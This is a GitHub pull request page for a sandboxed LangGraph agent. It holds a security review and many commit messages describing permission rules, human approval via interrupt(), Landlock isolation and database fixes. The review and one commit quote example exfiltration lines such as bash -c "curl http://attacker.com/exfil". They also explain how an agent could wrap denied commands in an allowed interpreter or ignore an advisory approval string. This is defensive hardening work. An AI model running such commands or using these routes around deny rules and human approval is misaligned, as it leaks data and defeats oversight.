feat: add sandbox_agent with per-context workspace isolation #126
Ladas wants to merge 227 commits
Conversation
pdettori
left a comment
Security & Completeness Review
Four issues identified — two security-critical, one missing TTL enforcement, and one unwired policy layer. Details in inline comments below.
| "shell(tree:*)", "shell(pwd:*)", "shell(mkdir:*)", "shell(cp:*)", | ||
| "shell(mv:*)", "shell(touch:*)", | ||
| "shell(python:*)", "shell(python3:*)", "shell(pip install:*)", | ||
| "shell(pip list:*)", "shell(sh:*)", "shell(bash:*)", |
🔴 Critical: Shell interpreter allow-rules bypass all deny rules
The allow list grants shell(bash:*), shell(sh:*), shell(python:*), and shell(python3:*) unconditionally. Because _match_shell() in permissions.py performs prefix-only matching on the command string, commands like:
bash -c "curl http://attacker.com/exfil"
python3 -c "import subprocess; subprocess.run(['curl', ...])"
will match shell(bash:*) / shell(python3:*) in the allow list, while the deny rules shell(curl:*) and shell(wget:*) only match commands that start with curl or wget. The network(outbound:*) deny rule is typed as network, but the executor only ever calls permission_checker.check("shell", operation) — there is no code path that checks outbound network at the OS/syscall level.
This is a complete sandbox escape: any denied command can be trivially executed as a subprocess of an allowed interpreter.
Suggested fix: Either (a) remove bash/sh/python/python3 from the blanket allow-list and whitelist specific scripts instead, or (b) add recursive argument inspection in _match_shell() for interpreter commands (detecting -c flags, pipe chains, etc.), or (c) use OS-level enforcement (seccomp, network policies) as a second layer.
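Option (b) could look roughly like the following. This is a minimal sketch, not the PR's code: is_denied(), DENY_PREFIXES, and INTERPRETERS are hypothetical names, and a real checker would also need AST-level inspection of Python -c payloads, which simple string recursion cannot catch.

```python
import shlex

# Illustrative policy: deny prefixes and interpreter names are assumptions,
# not the PR's actual settings.json contents.
DENY_PREFIXES = ("curl", "wget")
INTERPRETERS = {"bash", "sh", "python", "python3"}

def is_denied(command: str) -> bool:
    """True if the command, or any command embedded via an interpreter's
    -c flag (including |, &&, ||, ; chains), matches a deny prefix."""
    try:
        tokens = shlex.split(command)
    except ValueError:
        return True  # unparseable input is safest treated as denied
    if not tokens:
        return False
    prog = tokens[0].split("/")[-1]
    if prog in INTERPRETERS:
        for flag, payload in zip(tokens, tokens[1:]):
            if flag == "-c":
                # Split the payload on shell chaining operators and
                # recursively check each embedded segment.
                for sep in ("&&", "||", ";", "|"):
                    payload = payload.replace(sep, "\n")
                return any(
                    is_denied(seg.strip())
                    for seg in payload.splitlines()
                    if seg.strip()
                )
    return any(prog.startswith(p) for p in DENY_PREFIXES)
```

With this shape, `bash -c "curl …"` is denied because the embedded `curl` segment is re-checked, rather than the outer `bash` prefix deciding alone.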
try:
    result = await executor.run_shell(command)
except HitlRequired as exc:
    return f"APPROVAL_REQUIRED: command '{exc.command}' needs human approval."
🔴 Critical: HITL has no hard interrupt — LLM can bypass approval
The HitlRequired exception is caught here and converted to a plain string ("APPROVAL_REQUIRED: ...") returned to the LLM. There is no interrupt() call (LangGraph's mechanism for pausing the graph and requiring human input). The graph construction in build_graph() uses tools_condition and ToolNode but never calls interrupt().
This means the agent loop continues after receiving this string, and the LLM is free to:
- Ignore the approval message entirely
- Attempt a workaround command (e.g., rewriting the denied command using an allowed shell interpreter — see Issue 1)
- Simply not relay the approval request to the user
The docstrings in executor.py and permissions.py state that HITL "triggers LangGraph interrupt() for human approval," but the actual implementation relies on LLM self-reporting. This is not a security control — it is advisory at best.
Suggested fix: Replace the except HitlRequired handler with a proper LangGraph interrupt() call that pauses the graph execution and requires explicit human approval before resuming.
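A hedged sketch of what the fix could look like. langgraph.types.interrupt is the real LangGraph API (in production: `from langgraph.types import interrupt`); it is stubbed here so the block is self-contained, and HitlRequired, decide(), and the payload shape are illustrative names.

```python
class HitlRequired(Exception):
    def __init__(self, command: str):
        self.command = command

def interrupt(payload: dict):
    """Stub for langgraph.types.interrupt, which pauses the whole graph
    until the caller resumes it with Command(resume=...) on the thread."""
    raise NotImplementedError("requires a running LangGraph graph")

def decide(approval, command: str) -> str:
    """Interpret the resume value supplied by the human reviewer."""
    if isinstance(approval, dict) and approval.get("approved"):
        return f"APPROVED: {command}"
    return f"DENIED: human rejected command '{command}'"

async def shell_tool(command: str, executor) -> str:
    try:
        return await executor.run_shell(command)
    except HitlRequired as exc:
        approval = interrupt({"command": exc.command})  # graph pauses here
        return decide(approval, exc.command)
```

The key property is that interrupt() stops graph execution entirely; the LLM never sees an advisory string it could ignore.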
self.ttl_days = ttl_days

# ------------------------------------------------------------------
# Public API
🔴 No TTL enforcement or workspace cleanup
ttl_days is accepted here and written into .context.json metadata (line 91), but there is no implementation that ever reads this value back or acts on it. Specifically:
- No cleanup job, eviction logic, or scheduled task
- No delete_workspace() method exists
- No comparison of created_at + ttl_days against the current time
- disk_usage_bytes is tracked passively but never checked against any quota
- The only public methods are get_workspace_path(), ensure_workspace(), and list_contexts()
On a shared RWX PVC in a multi-tenant Kubernetes environment, this means workspaces accumulate indefinitely, creating both a resource exhaustion risk and a data retention compliance gap.
Suggested fix: Either (a) implement a cleanup_expired() method and wire it into a CronJob or startup hook, or (b) explicitly document ttl_days as advisory/future-only and add a tracking issue for enforcement.
entry = managers.get(manager)
if entry is None:
    return False
blocked: list[str] = entry.get("blocked_packages", [])
🟡 is_package_blocked() and is_git_remote_allowed() are never called in production code
These methods (and is_package_manager_enabled()) are defined and unit-tested but never wired into the executor or graph. In production code, only the following SourcesConfig members are used:
- is_web_access_enabled() — called in graph.py:_make_web_fetch_tool
- is_domain_allowed() — called in graph.py:_make_web_fetch_tool
- max_execution_time_seconds — used in executor.py:_execute

This means:
- pip install <blocked-package> will succeed if shell(pip install:*) is in the allow list — the blocked_packages list in sources.json is never consulted
- git clone <disallowed-remote> will succeed if shell(git clone:*) is in the allow list — allowed_remotes in sources.json is never checked
- max_memory_mb is also defined but never enforced
The sources.json capability layer was clearly designed as a second enforcement layer, but it is not wired up to the shell execution path.
Suggested fix: Either (a) add pre-execution hooks in the executor that call is_package_blocked() / is_git_remote_allowed() for matching commands, or (b) explicitly document these as "advisory only / planned for future iteration" and file tracking issues.
…L cleanup, sources enforcement

Address all 4 security findings from pdettori's review on PR kagenti#126:

1. Shell interpreter bypass (Critical): Add recursive argument inspection in PermissionChecker.check_interpreter_bypass() to detect -c/-e flags in bash/sh/python invocations. Embedded commands are checked against deny rules, preventing `bash -c "curl ..."` from bypassing `shell(curl:*)` deny rules.
2. HITL no interrupt() (Critical): Replace `except HitlRequired` string return with LangGraph `interrupt()` call that pauses graph execution. The agent cannot continue until a human explicitly approves via the HITLManager channel.
3. No TTL enforcement (Medium): Add `cleanup_expired()` method to WorkspaceManager. Reads created_at + ttl_days from .context.json and deletes expired workspace directories. Add `get_total_disk_usage()`.
4. sources.json not wired (Medium): Add `_check_sources()` pre-hook in SandboxExecutor.run_shell(). Checks pip/npm install commands against blocked_packages list and git clone URLs against allowed_remotes before execution.

Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com>
Signed-off-by: Ladislav Smola <lsmola@redhat.com>
Weather agent with ONLY auto-instrumentation - no custom middleware, no observability.py, no root span creation. The AuthBridge ext_proc creates the root span with all MLflow/OpenInference/GenAI attributes.

Agent changes from pre-PR-114 baseline:
- __init__.py: Add W3C Trace Context propagation + OpenAI auto-instr
- agent.py: Remove duplicate LangChainInstrumentor (moved to __init__)
- pyproject.toml: Add opentelemetry-instrumentation-openai
- Dockerfile: Use Docker Hub base image (GHCR auth fix)

Zero custom observability code - all root span attributes come from the AuthBridge ext_proc gRPC server.

Refs kagenti/kagenti#667
Signed-off-by: Ladas <lsmola@redhat.com>
Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com>
Signed-off-by: Ladislav Smola <lsmola@redhat.com>
Without ASGI/Starlette instrumentation, the agent's OTEL SDK never reads the traceparent header from incoming HTTP requests. This causes the AuthBridge ext_proc root span and agent LangChain spans to end up in separate disconnected traces. StarletteInstrumentor().instrument() patches Starlette to automatically extract traceparent from incoming requests, making all agent spans children of the ext_proc root span (same trace_id). Refs kagenti/kagenti#667 Signed-off-by: Ladas <lsmola@redhat.com> Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com> Signed-off-by: Ladislav Smola <lsmola@redhat.com>
New LangGraph agent with:
- settings.json three-tier permission checker (allow/deny/HITL)
- sources.json capability declaration (registries, remotes, limits)
- Per-context workspace manager on shared RWX PVC
- Sandbox executor with timeout enforcement
- Shell, file_read, file_write tools for LangGraph
- A2A server with streaming support

68 tests passing.

Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com>
Signed-off-by: Ladislav Smola <lsmola@redhat.com>
Signed-off-by: Ladislav Smola <lsmola@redhat.com>
Agents can now fetch content from URLs whose domain is in the sources.json allowed_domains list (github.com, api.github.com, etc). Blocked domains are checked first. HTML content is stripped to text. Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com> Signed-off-by: Ladislav Smola <lsmola@redhat.com>
Serialize LangChain messages via model_dump() and json.dumps() instead of Python str(). This produces valid JSON that the ext_proc can parse to extract GenAI semantic convention attributes (token counts, model name, tool names) without regex. Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com> Signed-off-by: Ladislav Smola <lsmola@redhat.com>
Without a checkpointer, LangGraph discards conversation state between invocations even when the same context_id/thread_id is used. This adds a shared MemorySaver instance to SandboxAgentExecutor and passes the thread_id config to graph.astream() so the checkpointer can route state per conversation thread. Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com> Signed-off-by: Ladislav Smola <lsmola@redhat.com>
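The wiring described above amounts to compiling the graph with a checkpointer and passing a per-conversation thread_id config on each invocation. MemorySaver and the configurable/thread_id keys are LangGraph's documented API; the helper below is just a convenience sketch with a name of our choosing.

```python
def thread_config(context_id: str) -> dict:
    """Config that makes the checkpointer key state by conversation thread."""
    return {"configurable": {"thread_id": context_id}}

# Illustrative wiring (requires langgraph installed):
#   from langgraph.checkpoint.memory import MemorySaver
#   graph = builder.compile(checkpointer=MemorySaver())
#   async for event in graph.astream(inputs, config=thread_config(context_id)):
#       ...
```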
C19 (multi-conversation isolation):
- Add startup cleanup of expired workspaces via cleanup_expired()
- Wire context_ttl_days from Configuration into WorkspaceManager
C20 (sub-agent spawning via LangGraph):
- Add subagents.py with two spawning modes:
- explore: in-process read-only sub-graph (grep, read_file, list_files)
bounded to 15 iterations, 120s timeout
- delegate: out-of-process SandboxClaim stub for production K8s clusters
- Wire explore and delegate tools into the main agent graph
- Update system prompt with sub-agent tool descriptions
Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com>
Signed-off-by: Ladislav Smola <lsmola@redhat.com>
Address code review findings:

1. Interpreter bypass now routes to HITL when embedded commands are not explicitly denied — prevents auto-allowing unknown commands wrapped in bash -c / sh -c via the outer shell(bash:*) allow rule.
2. Parse &&, ||, ; shell metacharacters in embedded commands, not just pipes. Catches "bash -c 'allowed && curl evil.com'" patterns.
3. Replace str().startswith() path traversal checks with Path.is_relative_to() across graph.py and subagents.py to prevent prefix collision attacks (/workspace vs /workspace-evil).
4. Guard against None approval in interrupt() resume — use isinstance(approval, dict) check.

Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com>
Signed-off-by: Ladislav Smola <lsmola@redhat.com>
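Item 3 is worth illustrating: a plain string-prefix check accepts sibling directories that merely share a prefix, while Path.is_relative_to (Python 3.9+) compares whole path components. The helper name below is ours.

```python
from pathlib import Path

def inside_workspace(candidate: str, workspace: str = "/workspace") -> bool:
    """Component-wise containment check, immune to /workspace-evil collisions."""
    return Path(candidate).resolve().is_relative_to(Path(workspace).resolve())
```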
Add langgraph-checkpoint-postgres and asyncpg dependencies. Agent uses AsyncPostgresSaver when CHECKPOINT_DB_URL is set, falls back to in-memory MemorySaver for dev/test without Postgres. Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com> Signed-off-by: Ladislav Smola <lsmola@redhat.com>
Replace InMemoryTaskStore with a2a-sdk's DatabaseTaskStore (PostgreSQL) when TASK_STORE_DB_URL is set. This is A2A-generic — works for any agent framework (LangGraph, CrewAI, AG2), not just LangGraph. The A2A SDK persists tasks, messages, artifacts, and contextId at the protocol level. Any A2A agent can adopt this with the same env var. Falls back to InMemoryTaskStore when no DB URL is configured. Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com> Signed-off-by: Ladislav Smola <lsmola@redhat.com>
Update the A2A agent card name, skill ID, and workspace agent_name from sandbox-assistant/Sandbox Assistant to sandbox-legion/Sandbox Legion. The Python package name (sandbox_agent) stays unchanged as it's an implementation detail, not user-facing. Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com> Signed-off-by: Ladislav Smola <lsmola@redhat.com>
The DatabaseTaskStore is in a2a.server.tasks, not a2a.server.tasks.sql_store. The incorrect import path caused the agent to silently fall back to InMemoryTaskStore. Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com> Signed-off-by: Ladislav Smola <lsmola@redhat.com>
Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com> Signed-off-by: Ladislav Smola <lsmola@redhat.com>
AsyncPostgresSaver.from_conn_string() returns a context manager that can't be used in sync __init__. Instead, create an asyncpg pool and initialize the saver lazily in execute() on first call. Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com> Signed-off-by: Ladislav Smola <lsmola@redhat.com>
Both asyncpg pool (checkpointer) and SQLAlchemy engine (TaskStore) need SSL disabled when connecting to the in-cluster postgres-sessions StatefulSet which doesn't have TLS configured. Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com> Signed-off-by: Ladislav Smola <lsmola@redhat.com>
LangGraph's AsyncPostgresSaver uses psycopg3, not asyncpg. Create AsyncConnectionPool from psycopg_pool and pass to saver. Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com> Signed-off-by: Ladislav Smola <lsmola@redhat.com>
The from_conn_string context manager properly handles connection pool setup and autocommit for CREATE INDEX CONCURRENTLY. Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com> Signed-off-by: Ladislav Smola <lsmola@redhat.com>
When models like gpt-4o-mini return content as a list of content blocks (text + tool_use), the previous code would stringify the entire list. Now properly extracts only text-type blocks for the final artifact. Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com> Signed-off-by: Ladislav Smola <lsmola@redhat.com>
- Per-context_id asyncio.Lock serializes graph execution for the same conversation (prevents stuck submitted tasks from concurrent requests)
- Shell interpreter bypass detection: catches bash -c/python -c patterns and recursively checks inner commands against permissions and sources policy
- TOFU verification on startup: hashes CLAUDE.md/sources.json, warns on mismatch (non-blocking)
- HITL interrupt() design documented in graph.py with implementation roadmap for graph-level approval flow
- Lock cleanup when >1000 idle entries to prevent memory leaks

Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com>
Signed-off-by: Ladislav Smola <lsmola@redhat.com>
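The TOFU (trust-on-first-use) verification step can be sketched as follows; the pin-file mechanism and function name are illustrative, not the PR's implementation:

```python
import hashlib
import json
from pathlib import Path

def tofu_check(files, pin_file: Path) -> list[str]:
    """Return names of policy files whose hash changed since first use.

    On first boot, pin the current SHA-256 of each file and trust it.
    On later boots, report mismatches (the caller warns, non-blocking).
    """
    digests = {
        str(f): hashlib.sha256(Path(f).read_bytes()).hexdigest() for f in files
    }
    if not pin_file.exists():
        pin_file.write_text(json.dumps(digests))  # first use: pin and trust
        return []
    pinned = json.loads(pin_file.read_text())
    return [name for name, d in digests.items() if pinned.get(name) != d]
```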
Agent now emits structured JSON events instead of Python str()/repr(). Each graph event is serialized with type, tools/name/content fields. Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com> Signed-off-by: Ladislav Smola <lsmola@redhat.com>
…sk history

Agent serializer: when the LLM calls tools, also emit its reasoning text as a separate llm_response event before the tool_call. This shows the full chain: thinking → tool_call → tool_result → response.

Backend history: aggregate messages across ALL task records for the same context_id. The A2A protocol creates immutable tasks per message exchange, so a multi-turn session has N task records. We now merge them in order with user message deduplication.

Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com>
Signed-off-by: Ladislav Smola <lsmola@redhat.com>
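The history merge described above can be sketched as a pure function; the task-record shape and the content-based deduplication key are assumptions, not the backend's actual schema:

```python
def merge_history(tasks: list[dict]) -> list[dict]:
    """Concatenate messages from N immutable task records (pre-sorted by
    creation time) and drop user messages echoed into later records."""
    merged, seen_user = [], set()
    for task in tasks:
        for msg in task["messages"]:
            if msg["role"] == "user":
                key = msg["content"]
                if key in seen_user:
                    continue  # duplicate of an earlier turn's user message
                seen_user.add(key)
            merged.append(msg)
    return merged
```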
…nnections Stale asyncpg connections caused 'connection was closed in the middle of operation' errors, breaking SSE streams. Now connections are recycled every 5 min and verified before use. Signed-off-by: Ladislav Smola <lsmola@redhat.com>
…ction build_graph requires workspace_path, permission_checker, and sources_config. Provide dummy values for graph card topology introspection (no execution, just node/edge extraction). Assisted-By: Claude (Anthropic AI) <noreply@anthropic.com> Signed-off-by: Ladislav Smola <lsmola@redhat.com>
PermissionChecker.__init__() requires a settings dict. Pass minimal valid config for graph card introspection (no execution needed). Assisted-By: Claude (Anthropic AI) <noreply@anthropic.com> Signed-off-by: Ladislav Smola <lsmola@redhat.com>
- Remove _current_node instance variable, use key parameter directly
- Fix O(n^2) byte concatenation in observability middleware response capture

Assisted-By: Claude (Anthropic AI) <noreply@anthropic.com>
Signed-off-by: Ladislav Smola <lsmola@redhat.com>
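On the O(n^2) concatenation fix: repeated bytes concatenation can copy the whole accumulated buffer on every chunk, while collecting chunks and joining once is linear. A minimal before/after (function names ours):

```python
def capture_quadratic(chunks) -> bytes:
    body = b""
    for c in chunks:
        body += c  # may copy the entire buffer each iteration
    return body

def capture_linear(chunks) -> bytes:
    parts = []
    for c in chunks:
        parts.append(c)  # O(1) append per chunk
    return b"".join(parts)  # single pass to assemble the body
```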
OTel instrumentation errors (TypeError in OpenAI response attributes) must never crash the agent. Wrap setup_observability() to catch all exceptions and continue without tracing. Assisted-By: Claude (Anthropic AI) <noreply@anthropic.com> Signed-off-by: Ladislav Smola <lsmola@redhat.com>
BaseHTTPMiddleware wraps response body iterators, which causes CancelledError propagation when SSE clients disconnect. This kills the A2A event queue and prevents event delivery to the UI. Keep LangChain/OpenAI auto-instrumentation (non-intrusive). Remove the per-request root span middleware until we implement per-node span emission from AgentGraphCard processing. Assisted-By: Claude (Anthropic AI) <noreply@anthropic.com> Signed-off-by: Ladislav Smola <lsmola@redhat.com>
When the reporter LLM calls respond_to_user tool instead of producing text content, the serializer now extracts the response argument and emits it as reporter_output with clean content field. 5 new tests. Assisted-By: Claude (Anthropic AI) <noreply@anthropic.com> Signed-off-by: Ladislav Smola <lsmola@redhat.com>
Assisted-By: Claude (Anthropic AI) <noreply@anthropic.com> Signed-off-by: Ladislav Smola <lsmola@redhat.com>
Assisted-By: Claude (Anthropic AI) <noreply@anthropic.com> Signed-off-by: Ladislav Smola <lsmola@redhat.com>
Add kernel-level per-session workspace isolation using raw ctypes Landlock syscalls (zero external dependencies). Each shell tool call forks a child process that applies irreversible Landlock rules restricting filesystem access to the session's workspace directory.

- landlock_ctypes.py: raw syscall wrapper (x86_64 + aarch64)
- landlock_probe.py: startup probe verifies kernel support
- sandbox_subprocess.py: per-tool-call fork with Landlock
- executor.py: wire sandboxed_subprocess behind SANDBOX_LANDLOCK env
- graph.py: symlink escape fix in glob tool
- Assertive: no fallback, pod fails if Landlock unavailable

Assisted-By: Claude (Anthropic AI) <noreply@anthropic.com>
Signed-off-by: Ladislav Smola <lsmola@redhat.com>
When the PostgreSQL connection drops (pod restart, idle timeout), the AsyncPostgresSaver pool has stale connections causing every subsequent request to fail with "the connection is closed". Fix:

- Add _ensure_checkpointer() with health check before each execute()
- Detect OperationalError in graph retry loop, re-init checkpointer
- Rebuild graph with fresh checkpointer on DB reconnect

Assisted-By: Claude (Anthropic AI) <noreply@anthropic.com>
Signed-off-by: Ladislav Smola <lsmola@redhat.com>
The nested _run_graph() function assigns graph in the retry path, which makes Python treat it as a local variable. Without nonlocal, the first iteration fails with UnboundLocalError. Assisted-By: Claude (Anthropic AI) <noreply@anthropic.com> Signed-off-by: Ladislav Smola <lsmola@redhat.com>
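A minimal reproduction of the scoping rule involved (names illustrative): assigning to a name anywhere in a nested function makes it local to that function, so the first read would raise UnboundLocalError unless the name is declared nonlocal.

```python
def make_runner():
    graph = "initial-graph"

    def _run_graph() -> str:
        # Without this declaration, the assignment below makes `graph`
        # local to _run_graph, and the read on the next line fails with
        # UnboundLocalError on the very first call.
        nonlocal graph
        result = f"ran {graph}"
        graph = "rebuilt-graph"  # retry path reassigns on DB reconnect
        return result

    return _run_graph
```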
AsyncPostgresSaver.from_conn_string() creates a single AsyncConnection that silently dies during long LLM calls (10-60s idle). Replace with AsyncConnectionPool (min=1, max=5) with connect_timeout=10s, TCP keepalives (idle=30s, interval=10s, count=3), and statement_timeout=30s. This prevents the indefinite hang when checkpoint writes hit a dead connection after Istio mesh idle timeout drops. Assisted-By: Claude (Anthropic AI) <noreply@anthropic.com> Signed-off-by: Ladislav Smola <lsmola@redhat.com>
Use LangGraph's durability="exit" mode to checkpoint only when graph execution completes, not after every node transition. Reduces writes from ~50 per request to 1, preventing PostgreSQL connection pool exhaustion under sustained test load. Assisted-By: Claude (Anthropic AI) <noreply@anthropic.com> Signed-off-by: Ladislav Smola <lsmola@redhat.com>
Emit TaskState.working status before graph initialization so SSE connections see data immediately. This prevents Istio/Envoy idle timeout during slow graph init (checkpointer, skills loading). Also rename local event_queue to graph_event_queue to eliminate variable shadowing with the A2A EventQueue parameter. Assisted-By: Claude (Anthropic AI) <noreply@anthropic.com> Signed-off-by: Ladislav Smola <lsmola@redhat.com>
Warm up LLM connection and DB pool at startup (Starlette on_startup
handler) instead of lazy-initializing on first request. This eliminates
the 30-60s cold start penalty on the first A2A message after pod restart.
Add /ready endpoint that returns 200 only after warm-up completes.
Kubernetes readiness probes should use /ready instead of the agent card
to ensure traffic only reaches agents with warm LLM executors.
Warm-up sequence:
1. ChatOpenAI.ainvoke("ping") — verifies LLM backend is reachable
2. _ensure_checkpointer() — opens PostgreSQL connection pool
3. Sets _warmup_status["ready"] = True
The warm LLM client is not cached (each request creates its own with
session-specific metadata), but the connection to the LLM backend is
validated, ensuring the first real request doesn't fail on connectivity.
Assisted-By: Claude (Anthropic AI) <noreply@anthropic.com>
Signed-off-by: Ladislav Smola <lsmola@redhat.com>
Starlette's on_startup is a constructor parameter, not a mutable list.
Use add_event_handler("startup", ...) which works across all versions.
Assisted-By: Claude (Anthropic AI) <noreply@anthropic.com>
Signed-off-by: Ladislav Smola <lsmola@redhat.com>
- Import ChatOpenAI from langchain_openai inside warmup (not in scope)
- Use agent_executor (public) instead of _agent_executor (private)

Assisted-By: Claude (Anthropic AI) <noreply@anthropic.com>
Signed-off-by: Ladislav Smola <lsmola@redhat.com>
Three changes to reduce context bloat and support slower reasoning models that produce verbose <think> output:

1. Reporter context windowing: keep last 30 messages verbatim, compress older messages into a ~2K char summary. Prevents unbounded context growth in multi-turn sessions.
2. Think-tag stripping: _clean_response() strips <think>...</think> blocks from AIMessage content before storing in state. Reasoning is useful for the current LLM call but bloats state for subsequent nodes and turns.
3. _summarize_messages() helper: lightweight text-only compaction (no LLM call) that extracts key info from each message type for reporter windowing.

Applied _clean_response at all node outputs: planner, executor, reflector, and reporter.

Assisted-By: Claude (Anthropic AI) <noreply@anthropic.com>
Signed-off-by: Ladislav Smola <lsmola@redhat.com>
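The think-tag stripping can be sketched as a single regex pass; the pattern and function body here are reconstructions, assuming <think>...</think> blocks as emitted by reasoning models:

```python
import re

# DOTALL so the reasoning block may span multiple lines; non-greedy so
# multiple blocks in one message are each removed separately.
_THINK_RE = re.compile(r"<think>.*?</think>\s*", re.DOTALL)

def clean_response(content: str) -> str:
    """Strip reasoning blocks before the message is stored in graph state."""
    return _THINK_RE.sub("", content).strip()
```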
Simple tasks like "echo hello" or "ls" now skip the planner entirely: Router detects shell one-liners via _SIMPLE_CMD_RE regex and creates a single-step plan directly (no planner LLM call). The executor then sets done=True on completion, causing the reflector to skip its LLM call and route straight to the reporter. Result: 2 LLM calls (executor + reporter) instead of 4 (planner + executor + reflector + reporter) for simple tasks. Detection patterns: "Run:", "echo", "ls", "cat", "pwd", "whoami", "date", "head", "tail", "wc", "find", "grep", and any prompt starting with "Run this shell command:". Complex tasks (multi-step, analysis, RCA) still use the full planner pipeline — no behavior change for those. Assisted-By: Claude (Anthropic AI) <noreply@anthropic.com> Signed-off-by: Ladislav Smola <lsmola@redhat.com>
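The fast-path detection can be approximated with a regex like the one below; _SIMPLE_CMD_RE here is a reconstruction from the patterns listed in the message, not the PR's actual expression:

```python
import re

# Matches "Run: ...", "Run this shell command: ...", or a prompt that
# starts with one of the listed shell one-liner commands.
_SIMPLE_CMD_RE = re.compile(
    r"^(Run( this shell command)?:\s*.+"
    r"|(echo|ls|cat|pwd|whoami|date|head|tail|wc|find|grep)\b.*)$",
    re.IGNORECASE,
)

def is_simple_task(prompt: str) -> bool:
    """True if the prompt should skip the planner and run as one step."""
    return bool(_SIMPLE_CMD_RE.match(prompt.strip()))
```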
The step_selector's LLM brief for single-step plans from the router fast-path was producing misleading briefs like "Respond to the user" instead of using the actual command text. This caused the executor to skip the shell tool and return "READY: step complete". For single-step plans (plan_version==1, len(plan)==1), use the plan text directly as the executor brief without an LLM call. This reduces fast-path LLM calls from 3 to 2 (executor + reporter only). Assisted-By: Claude (Anthropic AI) <noreply@anthropic.com> Signed-off-by: Ladislav Smola <lsmola@redhat.com>
With SANDBOX_FORCE_TOOL_CHOICE=1, the LLM should always produce tool calls. Llama 4 Scout sometimes ignores this and returns text like "READY: step complete" instead. Previously this required a full graph loop (executor → reflector → step_selector → executor = 3 LLM calls) to retry. Fix: retry the LLM call immediately within the executor node (1 extra call). If the retry produces tool calls, use them. Otherwise fall through to the existing 2-attempt stall detection. Assisted-By: Claude (Anthropic AI) <noreply@anthropic.com> Signed-off-by: Ladislav Smola <lsmola@redhat.com>
Summary
- sandbox_agent LangGraph agent with sandboxed shell execution
- settings.json three-tier permission checker (allow/deny/HITL)
- sources.json capability declaration (registries, remotes, runtime limits)

Tests
68 unit tests passing (permissions, sources, workspace, executor, graph)
Design Doc
See docs/plans/2026-02-14-agent-context-isolation-design.md in the kagenti/kagenti repo.

🤖 Generated with Claude Code